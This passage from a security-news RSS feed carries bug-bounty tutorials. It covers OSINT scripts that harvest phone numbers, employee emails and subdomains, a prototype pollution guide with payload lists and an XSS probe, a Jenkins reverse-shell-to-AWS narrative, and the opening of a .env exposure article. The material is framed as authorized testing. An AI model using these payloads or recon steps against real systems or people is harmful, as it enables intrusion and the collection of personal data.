(authorized)<br>    # dehashed API<br>    # curl -s "https://api.dehashed.com/v1/search?query=phone:$PHONE" \<br>    #     -u "$EMAIL:$DEHASHED_KEY" | jq -r '.entries[].domain' &gt;&gt; phone-domains.txt<br>    <br>    sleep 1<br>done &lt; phones.txt<br><br>sort -u phone-domains.txt -o phone-domains.txt<br>echo "[*] Found $(wc -l &lt; phone-domains.txt) domains from phone numbers"</pre><h3>Phase 3: Email Collection</h3><pre>#!/bin/bash<br># phase3-email-collect.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 3: Email Collection"<br><br># 3a. Hunter.io<br>curl -s "https://api.hunter.io/v2/domain-search?domain=$DOMAIN&amp;api_key=$HUNTER_KEY" | \<br>    jq -r '.data.emails[].value' &gt; emails-hunter.txt<br><br># 3b. theHarvester<br>theHarvester -d "$DOMAIN" -b google,linkedin,github -f /dev/null 2&gt;/dev/null | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@'"$DOMAIN" &gt; emails-harvester.txt<br><br># 3c. Skymem<br>curl -s "https://www.skymem.info/srch?q=$DOMAIN" | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-skymem.txt<br><br># 3d. Web page extraction<br>katana -u "https://$DOMAIN" -d 2 -silent | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-web.txt<br><br># 3e. JS file extraction<br>katana -u "https://$DOMAIN" -jc -silent | xargs -I{} curl -s {} 2&gt;/dev/null | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-js.txt<br><br># Combine<br>cat emails-hunter.txt emails-harvester.txt emails-skymem.txt emails-web.txt emails-js.txt | \<br>    sort -u &gt; emails.txt<br><br>echo "[*] Found $(wc -l &lt; emails.txt) unique email addresses"</pre><h3>Phase 4: Email → Domain Extraction</h3><pre>#!/bin/bash<br># phase4-email-to-domain.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 4: Email to Domain Extraction"<br><br># 4a. Extract all domains from email addresses<br>grep -oP '@[a-zA-Z0-9.-]+' emails.txt | sed 's/@//' | sort -u &gt; email-domains.txt<br><br># 4b. Remove the main domain (keep only non-obvious domains)<br>grep -v "$DOMAIN" email-domains.txt &gt; other-domains.txt<br><br>echo "[*] Found $(wc -l &lt; email-domains.txt) total domains from emails"<br>echo "[*] Found $(wc -l &lt; other-domains.txt) domains OUTSIDE the main domain"</pre><h3>Phase 5: LinkedIn → Name → Email → Domain</h3><pre>#!/bin/bash<br># phase5-linkedin-to-domains.sh<br>TARGET="$1"<br>DOMAIN="$2"<br><br>echo "[*] Phase 5: LinkedIn Name to Email to Domain"<br><br># 5a. Scrape LinkedIn for employees (manual or with tool)<br># linkedin_scraper -c "$TARGET" -o linkedin-employees.csv<br><br># 5b. Extract past companies from LinkedIn profiles<br># awk -F, '{print $3}' linkedin-employees.csv | sort -u &gt; past-companies.txt<br><br># 5c. For each past company, check if it's in scope<br>while read COMPANY; do<br>    echo "[*] Checking past company: $COMPANY"<br>    <br>    # Search for the company's domain<br>    domain_from_name=$(echo "$COMPANY" | tr '[:upper:]' '[:lower:]' | sed 's/ //g').com<br>    nslookup "$domain_from_name" &gt; /dev/null 2&gt;&amp;1 &amp;&amp; echo "$domain_from_name" &gt;&gt; past-company-domains.txt<br>    <br>done &lt; past-companies.txt<br><br># 5d. For each past company domain, check if acquired by target<br># Manual step: verify acquisition history</pre><h3>Phase 6: Cross-Reference and Subdomain Enumeration on New Domains</h3><pre>#!/bin/bash<br># phase6-subdomain-enum.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 6: Subdomain Enumeration on All Discovered Domains"<br><br># Combine all domain lists<br>cat phone-domains.txt other-domains.txt past-company-domains.txt | sort -u &gt; all-discovered-domains.txt<br><br># Run subdomain enumeration on each<br>while read DISCOVERED_DOMAIN; do<br>    echo "[*] Enumerating: $DISCOVERED_DOMAIN"<br>    <br>    # CT logs<br>    curl -s "https://crt.sh/?q=%25.$DISCOVERED_DOMAIN&amp;output=json" | \<br>        jq -r '.[].name_value' 2&gt;/dev/null &gt;&gt; all-subs.txt<br>    <br>    # Subfinder<br>    subfinder -d "$DISCOVERED_DOMAIN" -silent &gt;&gt; all-subs.txt<br>    <br>    # DNS brute-force<br>    puredns bruteforce ~/wordlists/subdomains.txt "$DISCOVERED_DOMAIN" \<br>        -r ~/resolvers.txt -q &gt;&gt; all-subs.txt<br>    <br>done &lt; all-discovered-domains.txt<br><br>sort -u all-subs.txt -o all-subs.txt<br>echo "[*] Total subdomains discovered: $(wc -l &lt; all-subs.txt)"</pre><h3>Part VI: The Complete Real-World Workflow</h3><p>To understand how this methodology works in practice, let's walk through an anonymized example of how phone numbers, emails, and public intelligence can reveal hidden assets. payflow.com</p><h3>08:00 — Phone Collection</h3><pre># WHOIS<br>whois payflow.com | grep -E "Phone|Tel"<br># +1 (415) 555-0100<br><br># Contact page<br>katana -u https://payflow.com/contact -d 1 | grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}'<br># +1 (415) 555-0100 (same)<br># +1 (512) 555-0200 (different — Austin)<br><br># Business registry<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=payflow" | \<br>    jq -r '.results[].company.phone_number'<br># +1 (512) 555-0200<br># +1 (512) 555-0300 (NEW — unknown)</pre><p>Phone numbers collected:</p><ul><li>+1 (415) 555-0100 (San Francisco — HQ)</li><li>+1 (512) 555-0200 (Austin — known office)</li><li>+1 (512) 555-0300 (Austin — UNKNOWN)</li></ul><h3>08:30 — Phone → Domain</h3><pre># SecurityTrails reverse WHOIS by phone<br># +1 (512) 555-0300 → registered to:<br># payflow-holdings.com<br># payflow-ventures.com<br># pf-internal.com</pre><p>New domains discovered:</p><ul><li>payflow-holdings.com — Holding company</li><li>payflow-ventures.com — Venture arm</li><li>pf-internal.com — INTERNAL DOMAIN</li></ul><h3>09:00 — Email Collection</h3><pre># Hunter.io: 847 emails<br># theHarvester: 312 emails<br># Skymem: 1,204 emails<br># Web scraping: 89 emails<br># JS files: 34 emails<br># Total unique: 1,892 emails</pre><h3>09:30 — Email → Domain Extraction</h3><pre>grep -oP '@[a-zA-Z0-9.-]+' emails.txt | sed 's/@//' | sort -u<br><br># Unique domains found in emails (excluding payflow.com):<br># payflow.io (known)<br># payflow.co (NEW)<br># payflow-engineering.com (NEW — engineering team domain)<br># pf-payments.com (NEW — payments processing domain)<br># payflow-benefits.com (NEW — HR/benefits domain)</pre><h3>10:00 — GitHub Cross-Reference</h3><pre># Searched for devops@payflow.com on GitHub<br># Found GitHub user: payflow-devops<br># Scanned repos for domain references<br><br># Found in deploy configs:<br># monitoring.internal.payflow.com<br># logs.internal.payflow.com<br># ci.internal.payflow.com</pre><h3>10:30 — Subdomain Enumeration on New Domains</h3><pre># On pf-internal.com:<br>subfinder -d pf-internal.com -silent<br># vpn.pf-internal.com (LIVE)<br># jenkins.pf-internal.com (LIVE)<br># git.pf-internal.com (LIVE)<br><br># On payflow-engineering.com:<br>subfinder -d payflow-engineering.com -silent<br># dev.payflow-engineering.com (LIVE)<br># staging.payflow-engineering.com (LIVE)<br># api.payflow-engineering.com (LIVE)</pre><h3>11:00 — Priority Assessment</h3><p>P0:</p><ol><li>vpn.pf-internal.com — VPN portal (potential credential access)</li><li>jenkins.pf-internal.com — Jenkins (potential RCE)</li><li>pf-internal.com — Internal domain (potential for more discovery)</li></ol><p>P1: 4. payflow-engineering.com — Engineering domain (dev/staging instances) 5. payflow-holdings.com — Holding company (potential subsidiary assets) 6. monitoring.internal.payflow.com — Monitoring (potential Grafana/Prometheus)</p><h3>11:30 — Attack Phase</h3><p>Jenkins on pf-internal.com:</p><ul><li>No authentication required</li><li>Created a freestyle project with a reverse shell</li><li>Got shell access to the Jenkins server</li><li>Jenkins had AWS keys in environment variables</li><li>AWS keys had full admin access to production</li></ul><p>Chain: 1 phone number → 3 unknown phone numbers → 1 unknown domain → 3 subdomains → 1 Jenkins server → AWS root access.</p><h3>Part VII: Tool Reference Guide</h3><h4>Phone Number Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/735/1*XnmWQ7exrxpOTsRHnIQ2qw.png"><figcaption>Phone Number Tools</figcaption></figure><h4>Email Collection Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/738/1*z4tA68XnkqGoK0X9Ey7C3A.png"><figcaption>Email Collection Tools</figcaption></figure><h4>Cross-Reference Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/716/1*IheT9-nPyVGeBaBpR9-gaQ.png"><figcaption>Cross-Reference Tools</figcaption></figure><h3>Part VIII: Common Mistakes (From Personal Experience)</h3><h3>Mistake 1: Not Checking All Phone Numbers from WHOIS</h3><p>A common mistake is finding one phone number in WHOIS and stopping too early, ran my reverse search, and stopped. There were actually three different phone numbers across different domains — I missed two.</p><p>Fix: Extract EVERY phone number from EVERY WHOIS record for EVERY domain you find.</p><h3>Mistake 2: Ignoring Email Domains That Don’t Match the Target</h3><p>What happened: I collected 2,000 emails for target.com. I filtered out everything that wasn't @target.com. I missed the 200 emails with @target-engineering.com, @target-holdings.com, and @target-benefits.com — all of which were owned by the same company.</p><p>Fix: Extract ALL unique domains from your email collection, not just the primary domain.</p><h3>Mistake 3: Not Checking LinkedIn Past Companies</h3><p>What happened: An employee’s LinkedIn profile showed they previously worked at acme-solutions.com. I ignored it. Acme Solutions had been acquired by my target three years prior. Its infrastructure was in scope but I never checked it.</p><p>Fix: Scrape past companies from LinkedIn profiles and cross-reference with acquisition history.</p><h3>Mistake 4: Not Running Subdomain Enumeration on Each New Domain</h3><p>What happened: I found pf-internal.com and added it to my list. I didn't run subfinder or CT log queries against it. vpn.pf-internal.com was sitting there the whole time.</p><p>Fix: Run full subdomain enumeration on EVERY domain you discover, no exceptions.</p><h3>Mistake 5: Stopping After One Round</h3><p>What happened: I discovered new domains, ran subfinder once, and started attacking. I didn’t recurse. Some of those new domains had their own subdomains, and those subdomains had their own CT logs.</p><p>Fix: Recursive enumeration. Every new domain → full acquisition pipeline → find more domains → repeat.</p><h3>Bug Hunter Acquisition Checklist — Phone &amp; Email Edition</h3><h3>☐ Phone Number Collection</h3><ul><li>☐ WHOIS records extracted for all discovered domains</li><li>☐ Contact/scraped pages (main site, subdomains, subsidiaries)</li><li>☐ Business registries checked (OpenCorporates, state registries)</li><li>☐ SEC filings reviewed (10-K, 10-Q, S-1)</li><li>☐ Press releases and news articles mined</li><li>☐ Social media profiles checked (LinkedIn, Twitter, Facebook)</li><li>☐ Breach data queried (with authorization)</li></ul><h3>☐ Phone Number Analysis</h3><ul><li>☐ VOIP provider identified for each number</li><li>☐ Area codes mapped to physical office locations</li><li>☐ Multi-number comparison for organizational structure</li><li>☐ Extension patterns identified</li><li>☐ Reverse WHOIS by phone number completed</li><li>☐ Business registry search by phone completed</li><li>☐ Phone number range scanning (if applicable)</li></ul><h3>☐ Phone → Domain Mapping</h3><ul><li>☐ Reverse WHOIS for every unique phone number</li><li>☐ Business registry domain mapping</li><li>☐ Carrier/VOIP provider infrastructure checked</li><li>☐ Support portal domains discovered (Zendesk, Freshdesk, etc.)</li><li>☐ VOIP admin console exposure checked</li><li>☐ Webhook endpoint testing (if Twilio/RingCentral identified)</li></ul><h3>☐ Email Collection</h3><ul><li>☐ Hunter.io domain search completed</li><li>☐ theHarvester multi-source harvest completed</li><li>☐ Skymem cross-reference completed</li><li>☐ Web page email extraction completed</li><li>☐ JavaScript file email extraction completed</li><li>☐ LinkedIn employee name scraping completed</li><li>☐ GitHub commit email extraction completed</li><li>☐ Mailing list/public forum extraction completed</li><li>☐ Breach data email extraction (with authorization)</li></ul><h3>☐ Email → Domain Extraction</h3><ul><li>☐ All unique domains extracted from email addresses</li><li>☐ Primary domain filtered out to reveal hidden domains</li><li>☐ Subsidiary/acquired company domains identified</li><li>☐ Internal/private domains identified</li><li>☐ Third-party service domains identified</li><li>☐ Employee personal domains identified</li></ul><h3>☐ Email → GitHub → Domain Chain</h3><ul><li>☐ GitHub accounts found for employee emails</li><li>☐ Repos and commits scanned for domain references</li><li>☐ Organization discovery completed</li><li>☐ Config files and environment vars checked</li><li>☐ Hardcoded endpoints extracted</li><li>☐ S3 bucket names and cloud resources extracted</li></ul><h3>☐ Email → Service → Domain Chain</h3><ul><li>☐ Atlassian (Jira/Confluence) instance discovered</li><li>☐ Slack workspace discovered</li><li>☐ Microsoft 365 tenant discovered</li><li>☐ Google Workspace tenant discovered</li><li>☐ Zendesk/Freshdesk/Helpscout portal discovered</li><li>☐ Status page hosted domain discovered</li><li>☐ Documentation/wiki hosted domain discovered</li></ul><h3>☐ Full Subdomain Enumeration on New Domains</h3><ul><li>☐ CT log queries (crt.sh, certspotter) for each new domain</li><li>☐ Passive DNS queries (SecurityTrails, VirusTotal)</li><li>☐ Subdomain brute-force (subfinder, puredns, massdns)</li><li>☐ Permutation-based discovery (alterx, gotator, dmut)</li><li>☐ Recursive enumeration (each subdomain → parent as new target)</li><li>☐ Wayback Machine historical subdomain discovery</li><li>☐ Technology fingerprinting (httpx, whatweb)</li><li>☐ HTTP response analysis (live vs. dead, redirects, error pages)</li></ul><h3>☐ Cross-Reference Validation</h3><ul><li>☐ Phone numbers matched to discovered domains</li><li>☐ Emails matched to discovered domains</li><li>☐ LinkedIn past companies cross-referenced with acquisitions</li><li>☐ GitHub profiles cross-referenced with company email domains</li><li>☐ Breach data cross-referenced (correlates emails, phones, domains)</li><li>☐ Scope validation for every newly discovered asset</li></ul><h3>☐ Continuous Monitoring</h3><ul><li>☐ Daily CT log monitoring for new subdomains on discovered domains</li><li>☐ Weekly phone number re-check (new WHOIS entries)</li><li>☐ Weekly email re-harvesting (new employees, new domains)</li><li>☐ GitHub monitoring for new employee commits</li><li>☐ Acquisition news monitoring (Google Alerts, Crunchbase)</li><li>☐ LinkedIn employee movement tracking</li><li>☐ Quarterly full pipeline re-run</li></ul><h3>Final Technical Notes</h3><h3>Why This Works at Scale</h3><p>The average Fortune 500 company has:</p><ul><li>50–200 registered domains</li><li>10–50 subsidiaries/acquired entities</li><li>2,000–20,000 employees</li><li>5–20 different phone numbers</li></ul><p>DNS brute-force will find maybe 30–50% of the subdomains on the main domain. It will find almost none of the subdomains on other domains.</p><p>Phone and email OSINT finds the other domains. Then you run DNS brute-force on those. The result is a 3–5x increase in discovered attack surface.</p><h3>The Data Flow</h3><pre>Phone Number → Reverse WHOIS → New Domains<br>Phone Number → Business Registry → Legal Entities → New Domains<br>Phone Number → VOIP Provider → Admin Console → Subdomains<br><br>Email Address → Hunter.io → Cross-Company Domains<br>Email Address → GitHub → Repos → Configs → Domains<br>Email Address → Breach Data → Service Registrations → Domains<br>Email Address → LinkedIn → Past Companies → Acquired Domains<br><br>New Domains → Subdomain Enumeration → Attack Surface</pre><h3>A Final Word on Authorization</h3><p>Everything in this blog assumes you have explicit written authorization to test the target’s assets. I do not share the names of actual targets. All examples are anonymized composites of real engagements.</p><p>If you’re new to bug bounty:</p><ol><li>Start with public programs on HackerOne/Bugcrowd that explicitly allow OSINT</li><li>Never use breach data unless the program explicitly permits it</li><li>Never use social engineering unless the program explicitly permits it</li><li>When in doubt, ask the program’s security team</li></ol><p>Disclaimer: Only for authorized bug bounty / pentesting environments.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*o-3pvh96SZd-YMZS.png"><figcaption>Follow US</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#BugBounty #OSINT #CyberSecurity #EthicalHacking #Infosec #PenetrationTesting #AttackSurface #SubdomainEnumeration #ThreatHunting #SecurityResearch #RedTeam #DigitalFootprint #CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #Programming</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=16b1e7d533cd" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a-16b1e7d533cd">Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [niedrig] Laravel: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Laravel ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3581276/it-security-nachrichten/neu-niedrig-laravel-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581276/it-security-nachrichten/neu-niedrig-laravel-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</guid>
<pubDate>Mon, 08 Jun 2026 13:38:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Laravel ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[JavaScript Prototype Pollution Deep Dive : — Reconnaissance, Exploitation & Bug Bounty Guideline]]></title>
<description><![CDATA[From Recon to RCE — A comprehensive deep-dive into one of JavaScript’s most misunderstood vulnerabilitiesJavaScript Prototype Pollution Deep DiveTable of ContentsWhat Is Prototype Pollution?The JavaScript Prototype Chain — Deep DiveAttack Vectors & Entry PointsReconnaissance MethodologyExploitati...]]></description>
<link>https://tsecurity.de/de/3580446/hacking/javascript-prototype-pollution-deep-dive-reconnaissance-exploitation-bug-bounty-guideline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580446/hacking/javascript-prototype-pollution-deep-dive-reconnaissance-exploitation-bug-bounty-guideline/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:25 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>From Recon to RCE — A comprehensive deep-dive into one of JavaScript’s most misunderstood vulnerabilities</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fRBOm82WKY9ycNXTz9B4Tw.png"><figcaption>JavaScript Prototype Pollution Deep Dive</figcaption></figure><h3>Table of Contents</h3><ol><li>What Is Prototype Pollution?</li><li>The JavaScript Prototype Chain — Deep Dive</li><li>Attack Vectors &amp; Entry Points</li><li>Reconnaissance Methodology</li><li>Exploitation Techniques — From XSS to RCE</li><li>Real-World Bug Bounty Case Studies</li><li>Advanced Exploit Chains</li><li>Tooling &amp; Automation</li><li>Defense &amp; Remediation</li><li>Full Python Scanner — Production-Ready</li></ol><h3>1. What Is Prototype Pollution?</h3><p>Prototype Pollution is a vulnerability where an attacker injects properties into JavaScript’s Object.prototype. Because all objects inherit from Object.prototype, the injected property propagates to every object in the runtime — including window, document, process, and any object created thereafter.</p><h3>Why It Matters</h3><p>Unlike SQL injection or XSS, Prototype Pollution often serves as a primer — it doesn’t immediately give you RCE unless you chain it with another gadget. But when chained correctly, the impact ranges from XSS (browser) to Remote Code Execution (Node.js).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/730/1*eqg_UNnsK1QKOPlTFFG_qQ.png"><figcaption>Impact Level</figcaption></figure><h3>2. The JavaScript Prototype Chain — Deep Dive</h3><h4>How Inheritance Works</h4><pre>// Every object has a hidden [[Prototype]]<br>const user = { name: "Alice" };</pre><pre>// user ---&gt; Object.prototype ---&gt; null<br>//         ^[[Prototype]]^</pre><p>When you access user.toString(), JavaScript:</p><ol><li>Looks for toString on user itself → not found</li><li>Looks on user.__proto__ (which is Object.prototype) → found!</li><li>Executes it.</li></ol><h3>The Vulnerability Mechanism</h3><pre>// Normal operation<br>const target = {};<br>const source = JSON.parse('{"name": "Alice"}');<br>Object.assign(target, source);<br>// target = { name: "Alice" } — safe</pre><pre>// Polluted operation<br>const source = JSON.parse('{"__proto__": {"isAdmin": true}}');<br>Object.assign(target, source);<br>// target.__proto__.isAdmin = true<br>// ALL objects now have isAdmin: true</pre><h3>Why __proto__ Works as a Key</h3><p>JSON parsing does NOT treat __proto__ specially — it's just a string key. When Object.assign() copies properties, it sets target.__proto__ which mutates the actual prototype chain.</p><pre>// Visual representation<br>const obj = {};<br>obj.__proto__.polluted = true;<br>// Equivalent to:<br>Object.prototype.polluted = true;</pre><pre>console.log({}.polluted);  // true<br>console.log([].polluted);  // true<br>console.log("".polluted);  // true (string prototype chain)</pre><h3>The Three Mutation Methods</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*x3HA5gBQwhCAZHlDeZp32Q.png"><figcaption>Method/Vul/Lib</figcaption></figure><h3>3. Attack Vectors &amp; Entry Points</h3><h4>Server-Side Entry Points (Node.js)</h4><pre>POST /api/users<br>Content-Type: application/json</pre><pre>{"name": "test", "__proto__": {"isAdmin": true}}</pre><p><strong>Where to look:</strong></p><ul><li>JSON body parsing (Express body-parser, express.json())</li><li>Query string parsing (qs library, Express built-in)</li><li>Cookie parsing</li><li>File upload metadata</li><li>GraphQL variables</li><li>WebSocket messages</li></ul><h3>Client-Side Entry Points (Browser)</h3><pre>&lt;!-- URL fragment parsing --&gt;<br>https://target.com/#__proto__[polluted]=true</pre><pre>&lt;!-- PostMessage --&gt;<br>window.postMessage({__proto__: {evil: true}}, '*')</pre><pre>&lt;!-- localStorage / sessionStorage --&gt;<br>localStorage.getItem('config') // parsed with JSON.parse</pre><pre>&lt;!-- WebSocket --&gt;<br>ws.send(JSON.stringify({__proto__: {innerHTML: '&lt;img src=x onerror=alert(1)&gt;'}}))</pre><h3>Common Vulnerable Patterns</h3><h4>Pattern 1: Object.assign / Spread Operator</h4><pre>app.post('/api/update', (req, res) =&gt; {<br>  const user = getUser(req.session.userId);<br>  Object.assign(user, req.body);  // VULNERABLE<br>  user.save();<br>});</pre><h4>Pattern 2: _.merge / $.extend</h4><pre>const config = _.merge(defaultConfig, userConfig); // VULNERABLE if userConfig comes from input</pre><h4>Pattern 3: Deep Clone</h4><pre>const cloned = JSON.parse(JSON.stringify(userInput)); <br>// JSON.parse + JSON.stringify is SAFE — it strips __proto__<br>// BUT: if you then merge cloned into another object...</pre><h4>Pattern 4: URL Query Parsing</h4><pre>// Using qs library with allowPrototypes: false (default is true in older versions)<br>const parsed = qs.parse('a.__proto__.b=c'); <br>// Older qs: parsed = { a: { __proto__: { b: 'c' } } }</pre><h3>4. Reconnaissance Methodology</h3><h3>Phase 1: Identify Dependencies</h3><p>Modern web apps are built on frameworks. Find the soft targets.</p><pre># Client-side: Look for known vulnerable libraries<br>curl -s https://target.com/assets/app.js | grep -iEo \<br>  '(jquery|lodash|underscore|handlebars|vue|react|angular|backbone)[@-]?[0-9.]+'</pre><pre># Server-side: Check for Node.js indicators<br>curl -sI https://target.com | grep -i 'x-powered-by\|server\|node'</pre><p><strong>Version lookup table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/733/1*sW15qtpZIk3rRmIovXQsxg.png"><figcaption>Vulnerable table</figcaption></figure><h3>Phase 2: Map All Input Points</h3><p>Build a comprehensive list of every location where user data is parsed into objects.</p><pre># Spider the application<br>gospider -s https://target.com -o spider_output</pre><pre># Extract endpoints from JavaScript<br>curl -s https://target.com/assets/app.js | \<br>  grep -oP 'POST|PUT|PATCH|GET.*(api|graphql|v1|v2|rest)' | \<br>  sort -u &gt; endpoints.txt</pre><h3>Phase 3: Brute-Force Pollute Vectors</h3><p>Target each endpoint with multiple payload variants.</p><pre>// Payload matrix — try ALL of these<br>{"__proto__":{"polluted":"yes"}}<br>{"__proto__":["polluted","yes"]}<br>{"__proto__":{"__proto__":{"polluted":"yes"}}}<br>{"constructor":{"prototype":{"polluted":"yes"}}}<br>{"a":{"__proto__":{"polluted":"yes"}}}<br>{"[__proto__]":{"polluted":"yes"}}<br>{"__proto__.polluted":"yes"}  // For query string parsersj</pre><h3>Phase 4: Detection Verification</h3><p>After sending the payload, verify if pollution took effect.</p><p>Server-side check:</p><pre># Send a probe payload that affects something observable<br>curl -s https://target.com/api/status | grep -i '"polluted":"yes"'<br># Or check if you get 200 instead of 403 on admin endpoints</pre><p>Client-side check (if you can execute JS):</p><pre>// Open console on the target page after triggering the pollution<br>Object.prototype.polluted === "yes"<br>// Or<br>({}).polluted === "yes"<br><br><br><br><br></pre><h3>⚠️ <strong>Content Notice</strong></h3><p>Due to community guidelines and responsible disclosure practices, I was unable to include the complete live exploit chain, weaponized payloads, and full proof-of-concept demonstrations in this article.</p><p>The concepts, impacts, and mitigation strategies are covered here for educational and defensive security purposes. Readers interested in the full technical research, complete exploit analysis, and detailed proof-of-concept examples can refer to the corresponding GitHub repository linked with this article.</p><p>This content is intended solely for security research, awareness, and defensive testing in authorized environments.</p><h4>Reed Full Blog: <a href="https://github.com/SecurityTalent/write-up">https://github.com/SecurityTalent/write-up</a></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*8FEPTDOVMoyB-eds.png"></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #Programming</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=25e0496ade04" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/javascript-prototype-pollution-deep-dive-reconnaissance-exploitation-bug-bounty-guideline-25e0496ade04">JavaScript Prototype Pollution Deep Dive : — Reconnaissance, Exploitation &amp; Bug Bounty Guideline</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Frontend Security & Bug Hunting: The .env File Crisis and Real-World Exploitation]]></title>
<description><![CDATA[The .env file is simultaneously one of the most convenient and most dangerous patterns in modern web development. The data is clear: over 12 million exposed files, 28 million credentials leaked on GitHub in 2025 alone, and 110,000 domains compromised in a single extortion campaign.For bug bounty ...]]></description>
<link>https://tsecurity.de/de/3571868/hacking/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571868/hacking/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation/</guid>
<pubDate>Thu, 04 Jun 2026 10:21:43 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The .env file is simultaneously one of the most convenient and most dangerous patterns in modern web development. The data is clear: over 12 million exposed files, 28 million credentials leaked on GitHub in 2025 alone, and 110,000 domains compromised in a single extortion campaign.</p><p>For bug bounty hunters, .env exposure remains one of the highest-impact, lowest-effort findings. The methodology is straightforward: subdomain enumeration, content discovery, GitHub dorking, and source map analysis. The payoff can be complete database access, cloud account takeover, or Remote Code Execution.</p><p>For developers and security teams, the solution requires a cultural shift: treat .env files as explosive devices, move secrets out of configuration files entirely, use short-lived credentials, block hidden files at the server level, and scan everything -- including AI-generated code -- before it reaches production.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TSS6p8MhJPdZtCHZZ0EC1g.png"><figcaption>Frontend Security &amp; Bug Hunting: The .env File Crisis and Real-World Exploitation</figcaption></figure><h3>Part I: The .env File Crisis — Why 12 Million Exposed Files Should Terrify You</h3><h4>The Anatomy of a .env File</h4><p>The .env file is the silent backbone of modern web application configuration. It stores environment variables in a simple KEY=VALUE format and is consumed by frameworks like Laravel, Django, Ruby on Rails, Symfony, and countless Node.js applications at startup. The problem is not the concept -- it is how these files are handled, deployed, and (mis)protected.</p><p>A typical .env file might 